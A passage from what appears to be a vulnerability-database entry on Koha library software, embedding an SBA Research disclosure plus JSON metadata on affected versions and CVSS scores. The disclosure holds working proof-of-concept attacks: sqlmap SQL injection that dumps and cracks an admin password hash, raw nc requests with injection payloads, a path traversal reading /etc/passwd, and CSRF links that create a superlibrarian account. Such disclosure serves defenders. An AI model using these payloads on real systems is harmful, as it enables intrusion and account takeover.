scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure ===============================================================================================
title: Koha Unauthenticated SQL injection product: Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact: cst@sba-research.org
References: http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
========================= 1. Mutiple SQL Injections =========================
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
- a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
Vulnerability:
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
##################################################################################################
PoC:
##################################################################################################
- Inspect Koha database schema
Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
- Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ | | ___ ___ {1.0-dev-nongit-20150513} | -| . | | | .'| . | || |||||__,| | || || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
- Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show ?:admin
1 password hash cracked, 0 left
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
##################################################################################################
PoC:
##################################################################################################
==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the evaluation of the payload.
##################################################################################################
PoC End
##################################################################################################
================================= 3. Path Traversal (CVE-2015-4633) =================================
Vulnerability
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
##################################################################################################
PoC:
##################################################################################################
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
##################################################################################################
PoC End
##################################################################################################
================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks.
The attack can be performed by:
- through a compromised user account.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
##################################################################################################
PoC / Attack Scenario:
##################################################################################################
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
--> http:///cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.
##################################################################################################
PoC / Attack Scenario End
##################################################################################################
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0024",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "library software community koha",
"scope": null,
"trust": 3.0,
"vendor": "koha",
"version": null
},
{
"model": "library software community",
"scope": "eq",
"trust": 1.0,
"vendor": "koha",
"version": "*"
},
{
"model": null,
"scope": "eq",
"trust": 1.0,
"vendor": "koha",
"version": "*"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.8"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.0"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.x"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.08"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.05"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.06"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.04"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.01"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.02"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.20"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.7"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.11"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.8"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.12"
}
],
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:koha:koha",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Raschin Ghanad-Tavakoli",
"sources": [
{
"db": "BID",
"id": "75426"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
}
],
"trust": 0.9
},
"cve": "CVE-2015-4631",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2015-4631",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05198",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05201",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05199",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05200",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05197",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2015-4631",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-4631",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-4631",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201512-696",
"trust": 0.6,
"value": "LOW"
},
{
"author": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. ===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing 